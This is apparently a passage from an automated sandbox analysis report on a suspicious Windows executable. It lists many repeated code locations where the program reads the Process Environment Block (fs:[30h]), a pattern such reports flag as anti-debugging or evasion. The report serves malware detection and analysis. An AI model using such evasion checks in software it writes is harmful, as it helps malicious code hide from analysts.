        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A91480 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9649B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9649B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B514FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A92CDB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACBC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A94439 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3C3E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3C3E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3C3E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAB433 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAB433 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAB433 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68C14 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B6740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B6740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B6740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B16C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B16C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B16C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B16C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B68C75 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AB746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AD5C70 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B2C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B2C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B68450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACA44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC65A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC65A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC65A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC35A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B605AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B605AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A92D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A92D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A92D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A92D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A92D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B5B581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B5B581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B5B581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B5B581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACFD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACFD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A93591 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC95EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B48DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A995F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A995F0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B4FDD3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A915C1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B16DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B68D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B1A537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACF527 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACF527 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACF527 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B5E539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A9AD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B53518 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B53518 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B53518 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ABC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AB8D76 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AB8D76 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AB8D76 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AB8D76 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AB8D76 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A9354C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A9354C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AD3D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B13540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B43D40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AB7D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AD4D51 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AD4D51 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B556B6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B556B6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B22EA3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B146A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A93E80 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A93E80 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACDE9E mov eax, dword ptr fs:[00000030h]
